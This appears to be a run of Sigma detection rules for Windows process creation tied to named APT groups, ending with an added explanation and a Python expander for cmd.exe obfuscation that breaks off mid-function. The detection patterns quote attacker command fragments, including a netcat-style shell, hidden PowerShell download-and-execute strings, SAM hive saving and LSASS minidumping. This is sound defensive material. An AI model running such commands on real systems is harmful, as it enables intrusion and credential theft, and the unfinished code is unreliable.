proc_creation_win_uac_bypass_ieinstal.yml
proc_creation_win_uac_bypass_msconfig_gui.yml
proc_creation_win_uac_bypass_ntfs_reparse_point.yml
proc_creation_win_uac_bypass_pkgmgr_dism.yml
proc_creation_win_uac_bypass_winsat.yml
proc_creation_win_uac_bypass_wmp.yml
proc_creation_win_uac_bypass_wsreset.yml
proc_creation_win_uac_cmstp.yml
proc_creation_win_uac_fodhelper.yml
proc_creation_win_uac_wsreset.yml
proc_creation_win_uninstall_crowdstrike_falcon.yml
proc_creation_win_uninstall_sysmon.yml
proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml
proc_creation_win_using_sc_to_hide_sevices.yml
proc_creation_win_using_settingsynchost_as_lolbin.yml
proc_creation_win_verclsid_runs_com.yml
proc_creation_win_visual_basic_compiler.yml
proc_creation_win_vmtoolsd_susp_child_process.yml
proc_creation_win_vul_java_remote_debugging.yml
proc_creation_win_webshell_detection.yml
proc_creation_win_webshell_recon_detection.yml
proc_creation_win_webshell_spawn.yml
proc_creation_win_whoami_as_priv_user.yml
proc_creation_win_whoami_as_system.yml
proc_creation_win_whoami_priv.yml
proc_creation_win_win10_sched_task_0day.yml
proc_creation_win_win_exchange_transportagent.yml
proc_creation_win_win_lolbas_dump64.yml
proc_creation_win_winword_dll_load.yml
proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
proc_creation_win_wmi_persistence_script_event_consumer.yml
proc_creation_win_wmi_spwns_powershell.yml
proc_creation_win_wmic_reconnaissance.yml
proc_creation_win_wmic_remote_service.yml
proc_creation_win_wmic_remove_application.yml
proc_creation_win_wmiprvse_spawning_process.yml
proc_creation_win_workflow_compiler.yml
proc_creation_win_write_protect_for_storage_disabled.yml
proc_creation_win_wsreset_uac_bypass.yml
proc_creation_win_xordump.yml
proc_creation_win_xsl_script_processing.yml

APT

proc_creation_win_apt_actinium_persistence.yml
title: Scheduled Task WScript VBScript
id: e1118a8f-82f5-44b3-bb6b-8a284e5df602
status: experimental
description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
author: Andreas Hunkeler (@Karneades)
references:
    - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
date: 2022/02/07
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'schtasks'
            - 'create'
            - 'wscript'
            - 'e:vbscript'
    condition: selection
fields:
    - CommandLine
    - ParentCommandLine
falsepositives:
    - Unlikely
level: high

proc_creation_win_apt_apt29_thinktanks.yml
title: APT29
id: 033fe7d6-66d1-4240-ac6b-28908009c71f
status: test
description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
author: Florian Roth
references:
    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
    - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
date: 2018/12/04
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '-noni'
            - '-ep'
            - 'bypass'
            - '$'
    condition: selection
falsepositives:
    - unknown
level: critical
tags:
    - attack.execution
    - attack.g0016
    - attack.t1059.001

proc_creation_win_apt_babyshark.yml
title: Baby Shark Activity
id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35
status: test
description: Detects activity that could be related to Baby Shark malware
author: Florian Roth
references:
    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
date: 2019/02/24
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
            - powershell.exe mshta.exe http*
            - cmd.exe /c taskkill /im cmd.exe
    condition: selection
falsepositives:
    - unknown
level: high
tags:
    - attack.execution
    - attack.t1059.003
    - attack.t1059.001
    - attack.discovery
    - attack.t1012
    - attack.defense_evasion
    - attack.t1218.005

proc_creation_win_apt_bear_activity_gtr19.yml
title: Judgement Panda Credential Access Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
status: test
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
author: Florian Roth
references:
    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
date: 2019/02/21
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        Image|endswith: '\xcopy.exe'
        CommandLine|contains|all:
            - '/S'
            - '/E'
            - '/C'
            - '/Q'
            - '/H'
            - '\\'
    selection2:
        Image|endswith: '\adexplorer.exe'
        CommandLine|contains|all:
            - '-snapshot'
            - '""'
            - 'c:\users\'
    condition: selection1 or selection2
falsepositives:
    - unknown
level: critical
tags:
    - attack.credential_access
    - attack.t1552.001
    - attack.t1003.003

proc_creation_win_apt_bluemashroom.yml
title: BlueMashroom DLL Load
id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
status: test
description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
author: Florian Roth, Tim Shelton
references:
    - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
date: 2019/10/02
modified: 2022/03/02
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains|all:
            - '\regsvr32'
            - '\AppData\Local\'
        - CommandLine|contains|all:
            - '\AppData\Local\'
            - ',DllEntry'
    filter_1:
        - CommandLine|contains: 'AppData\Local\Microsoft\TeamsMeetingAddin\'
        - CommandLine|endswith:
            - '\x86\Microsoft.Teams.AddinLoader.dll'
            - '\x86\Microsoft.Teams.AddinLoader.dll"'
            - '\x64\Microsoft.Teams.AddinLoader.dll'
            - '\x64\Microsoft.Teams.AddinLoader.dll"'
    condition: selection and not 1 of filter*
falsepositives:
    - Unlikely
level: critical
tags:
    - attack.defense_evasion
    - attack.t1218.010

proc_creation_win_apt_chafer_mar18.yml
title: Chafer Activity
id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
related:
    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
      type: derived
description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
status: experimental
references:
    - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
tags:
    - attack.persistence
    - attack.g0049
    - attack.t1053.005
    - attack.s0111
    - attack.t1543.003
    - attack.defense_evasion
    - attack.t1112
    - attack.command_and_control
    - attack.t1071.004
date: 2018/03/23
modified: 2021/09/19
author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
logsource:
    category: process_creation
    product: windows
detection:
    selection_process0:
        CommandLine|contains: '\Service.exe'
        CommandLine|endswith:
            - 'i'
            - 'u'
    selection_process1:
        - CommandLine|endswith: '\microsoft\Taskbar\autoit3.exe'
        - CommandLine|startswith: 'C:\wsc.exe'
    selection_process2:
        Image|contains: '\Windows\Temp\DB\'
        Image|endswith: '.exe'
    selection_process3:
        CommandLine|contains|all:
            - '\nslookup.exe'
            - '-q=TXT'
        ParentImage|contains: '\Autoit'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical

proc_creation_win_apt_cloudhopper.yml
title: WMIExec VBS Script
id: 966e4016-627f-44f7-8341-f394905c361f
status: test
description: Detects suspicious file execution by wscript and cscript
author: Florian Roth
references:
    - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
date: 2017/04/07
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cscript.exe'
        CommandLine|contains|all:
            - '.vbs'
            - '/shell'
    condition: selection
fields:
    - CommandLine
    - ParentCommandLine
falsepositives:
    - Unlikely
level: critical
tags:
    - attack.execution
    - attack.g0045
    - attack.t1059.005

proc_creation_win_apt_dragonfly.yml
title: CrackMapExecWin
id: 04d9079e-3905-4b70-ad37-6bdf11304965
status: test
description: Detects CrackMapExecWin Activity as Described by NCSC
author: Markus Neis
references:
    - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control
    - https://attack.mitre.org/software/S0488/
date: 2018/04/08
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\crackmapexec.exe'
    condition: selection
falsepositives:
    - None
level: critical
tags:
    - attack.g0035
    - attack.credential_access
    - attack.discovery
    - attack.t1110
    - attack.t1087

proc_creation_win_apt_elise.yml
title: Elise Backdoor
id: e507feb7-5f73-4ef6-a970-91bb6f6d744f
status: test
description: Detects Elise backdoor activity as used by APT32
author: Florian Roth
references:
    - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
date: 2018/01/31
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        Image: 'C:\Windows\SysWOW64\cmd.exe'
        CommandLine|contains: '\Windows\Caches\NavShExt.dll '
    selection2:
        CommandLine|endswith: '\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
tags:
    - attack.g0030
    - attack.g0050
    - attack.s0081
    - attack.execution
    - attack.t1059.003

proc_creation_win_apt_emissarypanda_sep19.yml
title: Emissary Panda Malware SLLauncher
id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
status: test
description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
author: Florian Roth
references:
    - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
    - https://twitter.com/cyb3rops/status/1168863899531132929
date: 2018/09/03
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\sllauncher.exe'
        Image|endswith: '\svchost.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.defense_evasion
    - attack.t1574.002

proc_creation_win_apt_empiremonkey.yml
title: Empire Monkey
id: 10152a7b-b566-438f-a33c-390b607d1c8d
status: test
description: Detects EmpireMonkey APT reported Activity
author: Markus Neis
references:
    - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b
date: 2019/04/02
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection_cutil:
        CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll'
        Image|endswith: '\cutil.exe'
    selection_regsvr32:
        CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll'
        Description: 'Microsoft(C) Registerserver'
    condition: 1 of selection*
falsepositives:
    - Very Unlikely
level: critical
tags:
    - attack.defense_evasion
    - attack.t1218.010

proc_creation_win_apt_equtiongroup_dll_u_load.yml
title: Equation Group DLL_U Load
id: d465d1d8-27a2-4cca-9621-a800f37cf72e
status: test
description: Detects a specific tool and export used by EquationGroup
author: Florian Roth
references:
    - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
    - https://securelist.com/apt-slingshot/84312/
    - https://twitter.com/cyb3rops/status/972186477512839170
date: 2019/03/04
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: ',dll_u'
    selection2:
        CommandLine|contains: ' -export dll_u '
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
tags:
    - attack.g0020
    - attack.defense_evasion
    - attack.t1218.011

proc_creation_win_apt_evilnum_jul20.yml
title: EvilNum Golden Chickens Deployment via OCX Files
id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0
status: test
description: Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020
author: Florian Roth
references:
    - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
    - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
date: 2020/07/10
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'regsvr32'
            - '/s'
            - '/i'
            - '\AppData\Roaming\'
            - '.ocx'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.defense_evasion
    - attack.t1218.011

proc_creation_win_apt_gallium.yml
title: GALLIUM Artefacts
id: 18739897-21b1-41da-8ee4-5b786915a676
related:
    - id: 440a56bf-7873-4439-940a-1c8a671073c2
      type: derived
status: experimental
description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
author: Tim Burrell
date: 2020/02/07
modified: 2021/09/19
references:
    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
tags:
    - attack.credential_access
    - attack.t1212
    - attack.command_and_control
    - attack.t1071
logsource:
    product: windows
    category: process_creation
detection:
    legitimate_process_path:
        Image|contains:
            - ':\Program Files(x86)\'
            - ':\Program Files\'
    legitimate_executable:
        sha1:
            - 'e570585edc69f9074cb5e8a790708336bd45ca0f'
    condition: legitimate_executable and not legitimate_process_path
falsepositives:
    - unknown
level: high

proc_creation_win_apt_gallium_sha1.yml
title: GALLIUM Artefacts
id: 440a56bf-7873-4439-940a-1c8a671073c2
status: experimental
description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
author: Tim Burrell
date: 2020/02/07
modified: 2021/09/19
references:
    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
tags:
    - attack.credential_access
    - attack.t1212
    - attack.command_and_control
    - attack.t1071
logsource:
    product: windows
    category: process_creation
detection:
    exec_selection:
        sha1:
            - '53a44c2396d15c3a03723fa5e5db54cafd527635'
            - '9c5e496921e3bc882dc40694f1dcc3746a75db19'
            - 'aeb573accfd95758550cf30bf04f389a92922844'
            - '79ef78a797403a4ed1a616c68e07fff868a8650a'
            - '4f6f38b4cec35e895d91c052b1f5a83d665c2196'
            - '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d'
            - 'e841a63e47361a572db9a7334af459ddca11347a'
            - 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d'
            - '2e94b305d6812a9f96e6781c888e48c7fb157b6b'
            - 'dd44133716b8a241957b912fa6a02efde3ce3025'
            - '8793bf166cb89eb55f0593404e4e933ab605e803'
            - 'a39b57032dbb2335499a51e13470a7cd5d86b138'
            - '41cc2b15c662bc001c0eb92f6cc222934f0beeea'
            - 'd209430d6af54792371174e70e27dd11d3def7a7'
            - '1c6452026c56efd2c94cea7e0f671eb55515edb0'
            - 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a'
            - '4923d460e22fbbf165bbbaba168e5a46b8157d9f'
            - 'f201504bd96e81d0d350c3a8332593ee1c9e09de'
            - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2'
    condition: exec_selection
falsepositives:
    - unknown
level: high

proc_creation_win_apt_greenbug_may20.yml
title: Greenbug Campaign Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: experimental
description: Detects tools and process executions as observed in a Greenbug campaign in May 2020
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth
date: 2020/05/20
modified: 2021/09/21
tags:
    - attack.g0049
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1105
    - attack.defense_evasion
    - attack.t1036.005
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains|all:
            - 'bitsadmin'
            - '/transfer'
            - 'CSIDL_APPDATA'
    selection2:
        CommandLine|contains:
            - 'CSIDL_SYSTEM_DRIVE'
    selection3:
        CommandLine|contains:
            - '\msf.ps1'
            - '8989 -e cmd.exe'
            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
            - '-nop -w hidden -c $k=new-object'
            - '[Net.CredentialCache]::DefaultCredentials;IEX '
            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
            - '-noninteractive -executionpolicy bypass whoami'
            - '-noninteractive -executionpolicy bypass netstat -a'
            - 'L3NlcnZlcj1' # base64 encoded '/server='
    selection4:
        Image|endswith:
            - '\adobe\Adobe.exe'
            - '\oracle\local.exe'
            - '\revshell.exe'
            - 'infopagesbackup\ncat.exe'
            - 'CSIDL_SYSTEM\cmd.exe'
            - '\programdata\oracle\java.exe'
            - 'CSIDL_COMMON_APPDATA\comms\comms.exe'
            - '\Programdata\VMware\Vmware.exe'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical

proc_creation_win_apt_hafnium.yml
title: Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
author: Florian Roth
date: 2021/03/09
modified: 2021/03/16
status: experimental
references:
    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
    - https://twitter.com/BleepinComputer/status/1372218235949617161
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains|all:
            - 'attrib'
            - ' +h '
            - ' +s '
            - ' +r '
            - '.aspx'
    selection2:
        CommandLine|contains|all:
            - 'schtasks'
            - 'VSPerfMon'
    selection3:
        CommandLine|contains|all:
            - 'vssadmin list shadows'
            - 'Temp\__output'
    selection4:
        CommandLine|contains: '%TEMP%\execute.bat'
    selection5:
        Image|endswith: 'Users\Public\opera\Opera_browser.exe'
    selection6:
        Image|endswith: 'Opera_browser.exe'
        ParentImage|endswith:
            - '\services.exe'
            - '\svchost.exe'
    selection7:
        Image|contains: '\ProgramData\VSPerfMon\'
    selection8:
        CommandLine|contains|all:
            - ' -t7z '
            - 'C:\Programdata\pst'
            - '\it.zip'
    selection9:
        Image|endswith: '\makecab.exe'
        CommandLine|contains:
            - 'Microsoft\Exchange Server\'
            - 'inetpub\wwwroot'
    selection10:
        CommandLine|contains:
            - '\Temp\xx.bat'
            - 'Windows\WwanSvcdcs'
            - 'Windows\Temp\cw.exe'
    selection11:
        CommandLine|contains|all:
            - '\comsvcs.dll'
            - 'Minidump'
            - '\inetpub\wwwroot'
    selection12:
        CommandLine|contains|all:
            - 'dsquery'
            - ' -uco '
            - '\inetpub\wwwroot'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: high
tags:
    - attack.persistence
    - attack.t1546
    - attack.t1053

proc_creation_win_apt_hurricane_panda.yml
title: Hurricane Panda Activity
id: 0eb2107b-a596-422e-b123-b389d5594ed7
status: test
description: Detects Hurricane Panda Activity
author: Florian Roth
references:
    - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
date: 2019/03/04
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains|all:
            - 'localgroup'
            - 'admin'
            - '/add'
        - CommandLine|contains:
            - '\Win64.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.privilege_escalation
    - attack.g0009
    - attack.t1068

proc_creation_win_apt_judgement_panda_gtr19.yml
title: Judgement Panda Exfil Activity
id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
status: test
description: Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike
author: Florian Roth
references:
    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
date: 2019/02/21
modified: 2021/11/27
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        - CommandLine|endswith: 'eprod.ldf'
        - CommandLine|contains:
            - '\ldifde.exe -f -n '
            - '\7za.exe a 1.7z '
            - '\aaaa\procdump64.exe'
            - '\aaaa\netsess.exe'
            - '\aaaa\7za.exe'
            - 'copy .\1.7z \'
            - 'copy \\client\c$\aaaa\'
    selection2:
        Image: C:\Users\Public\7za.exe
    condition: selection1 or selection2
falsepositives:
    - unknown
level: critical
tags:
    - attack.lateral_movement
    - attack.g0010
    - attack.credential_access
    - attack.t1003.001
    - attack.exfiltration
    - attack.t1560.001

proc_creation_win_apt_ke3chang_regadd.yml
  1. title: Ke3chang Registry Key Modifications
  2. id: 7b544661-69fc-419f-9a59-82ccc328f205
  3. status: test
  4. description: Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020
  5. author: Markus Neis, Swisscom
  6. references:
  7. - https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
  8. - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
  9. date: 2020/06/18
  10. modified: 2021/11/27
  11. logsource:
  12. category: process_creation
  13. product: windows
  14. detection:
  15. selection1:
  16. # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys.
  17. # Setting these registry keys is unique to the Ke3chang and TidePool malware families.
  18. # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
  19. # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
  20. # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden
  21. CommandLine|contains:
  22. - '-Property DWORD -name DisableFirstRunCustomize -value 2 -Force'
  23. - '-Property String -name Check_Associations -value'
  24. - '-Property DWORD -name IEHarden -value 0 -Force'
  25. condition: selection1
  26. falsepositives:
  27. - Possible on single hits; look for combinations of these registry modifications from the same process
  28. level: critical
  29. tags:
  30. - attack.g0004
  31. - attack.defense_evasion
  32. - attack.t1562.001

proc_creation_win_apt_lazarus_activity_apr21.yml
  1. title: Lazarus Activity
  2. id: 4a12fa47-c735-4032-a214-6fab5b120670
  3. description: Detects different process creation events as described in the Malwarebytes threat report on Lazarus group activity
  4. status: experimental
  5. references:
  6. - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
  7. tags:
  8. - attack.g0032
  9. - attack.execution
  10. - attack.t1106
  11. author: Bhabesh Raj
  12. date: 2021/04/20
  13. modified: 2021/06/27
  14. logsource:
  15. category: process_creation
  16. product: windows
  17. detection:
  18. selection1:
  19. CommandLine|contains|all:
  20. - 'mshta'
  21. - '.zip'
  22. selection2:
  23. ParentImage:
  24. - 'C:\Windows\System32\wbem\wmiprvse.exe'
  25. Image:
  26. - 'C:\Windows\System32\mshta.exe'
  27. selection3:
  28. ParentImage|contains:
  29. - ':\Users\Public\'
  30. Image:
  31. - 'C:\Windows\System32\rundll32.exe'
  32. condition: 1 of selection*
  33. falsepositives:
  34. - Should not be any false positives
  35. level: critical

proc_creation_win_apt_lazarus_activity_dec20.yml
  1. title: Lazarus Activity
  2. id: 24c4d154-05a4-4b99-b57d-9b977472443a
  3. description: Detects different process creation events as described in various threat reports on Lazarus group activity
  4. status: experimental
  5. references:
  6. - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
  7. - https://www.hvs-consulting.de/lazarus-report/
  8. tags:
  9. - attack.g0032
  10. - attack.execution
  11. - attack.t1059
  12. author: Florian Roth
  13. date: 2020/12/23
  14. modified: 2021/06/27
  15. logsource:
  16. category: process_creation
  17. product: windows
  18. detection:
  19. selection1:
  20. CommandLine|contains:
  21. - 'reg.exe save hklm\sam %temp%\~reg_sam.save'
  22. - '1q2w3e4r@#$@#$@#$'
  23. - ' -hp1q2w3e4 '
  24. - '.dat data03 10000 -p '
  25. selection2:
  26. CommandLine|contains|all:
  27. - 'process call create'
  28. - ' > %temp%\~'
  29. selection3:
  30. CommandLine|contains|all:
  31. - 'netstat -aon | find '
  32. - ' > %temp%\~'
  33. # Network share discovery
  34. selection4:
  35. CommandLine|contains:
  36. - '.255 10 C:\ProgramData\'
  37. condition: 1 of selection*
  38. falsepositives:
  39. - Overlap with legitimate process activity in some cases (especially selection 3 and 4)
  40. level: critical

proc_creation_win_apt_lazarus_loader.yml
  1. title: Lazarus Loaders
  2. id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
  3. description: Detects different loaders as described in various threat reports on Lazarus group activity
  4. status: experimental
  5. references:
  6. - https://www.hvs-consulting.de/lazarus-report/
  7. - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
  8. tags:
  9. - attack.g0032
  10. - attack.execution
  11. - attack.t1059
  12. author: Florian Roth, wagga
  13. date: 2020/12/23
  14. modified: 2021/06/27
  15. logsource:
  16. category: process_creation
  17. product: windows
  18. detection:
  19. selection_cmd1:
  20. CommandLine|contains|all:
  21. - 'cmd.exe /c '
  22. - ' -p 0x'
  23. selection_cmd2:
  24. CommandLine|contains:
  25. - 'C:\ProgramData\'
  26. - 'C:\RECYCLER\'
  27. selection_rundll1:
  28. CommandLine|contains|all:
  29. - 'rundll32.exe '
  30. - 'C:\ProgramData\'
  31. selection_rundll2:
  32. CommandLine|contains:
  33. - '.bin,'
  34. - '.tmp,'
  35. - '.dat,'
  36. - '.io,'
  37. - '.ini,'
  38. - '.db,'
  39. condition: ( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )
  40. falsepositives:
  41. - unknown
  42. level: critical

proc_creation_win_apt_lazarus_session_highjack.yml
  1. title: Lazarus Session Highjacker
  2. id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
  3. status: test
  4. description: Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)
  5. author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
  6. references:
  7. - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
  8. date: 2020/06/03
  9. modified: 2021/11/27
  10. logsource:
  11. category: process_creation
  12. product: windows
  13. detection:
  14. selection:
  15. Image|endswith:
  16. - '\msdtc.exe'
  17. - '\gpvc.exe'
  18. filter:
  19. Image|startswith:
  20. - 'C:\Windows\System32\'
  21. - 'C:\Windows\SysWOW64\'
  22. condition: selection and not filter
  23. falsepositives:
  24. - unknown
  25. level: high
  26. tags:
  27. - attack.defense_evasion
  28. - attack.t1036.005

proc_creation_win_apt_muddywater_dnstunnel.yml
  1. title: DNS Tunnel Technique from MuddyWater
  2. id: 36222790-0d43-4fe8-86e4-674b27809543
  3. status: test
  4. description: Detects DNS tunnel activity of the MuddyWater actor
  5. author: '@caliskanfurkan_'
  6. references:
  7. - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/
  8. - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
  9. date: 2020/06/04
  10. modified: 2021/11/27
  11. logsource:
  12. category: process_creation
  13. product: windows
  14. detection:
  15. selection:
  16. Image|endswith:
  17. - '\powershell.exe'
  18. ParentImage|endswith:
  19. - '\excel.exe'
  20. CommandLine|contains:
  21. - 'DataExchange.dll'
  22. condition: selection
  23. falsepositives:
  24. - Unknown
  25. level: critical
  26. tags:
  27. - attack.command_and_control
  28. - attack.t1071.004

proc_creation_win_apt_mustangpanda.yml
  1. title: Mustang Panda Dropper
  2. id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00
  3. status: test
  4. description: Detects specific process parameters as used by Mustang Panda droppers
  5. author: Florian Roth, oscd.community
  6. references:
  7. - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
  8. - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
  9. - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
  10. date: 2019/10/30
  11. modified: 2021/11/27
  12. logsource:
  13. category: process_creation
  14. product: windows
  15. detection:
  16. selection1:
  17. - CommandLine|contains:
  18. - 'Temp\wtask.exe /create'
  19. - '%windir:~-3,1%%PUBLIC:~-9,1%'
  20. - '/tn "Security Script '
  21. - '%windir:~-1,1%'
  22. - CommandLine|contains|all:
  23. - '/E:vbscript'
  24. - 'C:\Users\'
  25. - '.txt'
  26. - '/F'
  27. selection2:
  28. Image|endswith: 'Temp\winwsh.exe'
  29. condition: 1 of selection*
  30. fields:
  31. - CommandLine
  32. - ParentCommandLine
  33. falsepositives:
  34. - Unlikely
  35. level: high
  36. tags:
  37. - attack.t1587.001
  38. - attack.resource_development
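
The '%windir:~-3,1%%PUBLIC:~-9,1%' and '%windir:~-1,1%' strings in the Mustang Panda rule are cmd.exe substring expansions of the form %VAR:~start,length%, which assemble a command one character at a time from environment-variable values so that the final command never appears literally in the script. The following is an added example, not part of the Sigma rule or of any project code: it expands such fragments using assumed default values for windir, PUBLIC and COMSPEC. On a real host the expanded characters depend on that host's actual variables (for instance C:\WINDOWS versus C:\Windows), which is why the rule matches the literal obfuscated text rather than its expansion.

```python
"""Expand cmd.exe environment-variable substring syntax, %VAR:~start,length%,
as seen in the Mustang Panda command lines above. Added example, not Sigma
project code. ASSUMED_ENV holds typical defaults; a real host's values may differ."""
import re
from typing import Dict

# Assumed defaults for a stock English Windows install (not taken from any sample).
ASSUMED_ENV: Dict[str, str] = {
    "windir": "C:\\Windows",
    "PUBLIC": "C:\\Users\\Public",
    "COMSPEC": "C:\\Windows\\System32\\cmd.exe",
}

# %NAME%, %NAME:~START% or %NAME:~START,LENGTH%; START and LENGTH may be negative.
_EXPANSION = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def expand(command: str, env: Dict[str, str] = ASSUMED_ENV) -> str:
    """Replace every expansion whose variable is known; leave unknown ones untouched."""
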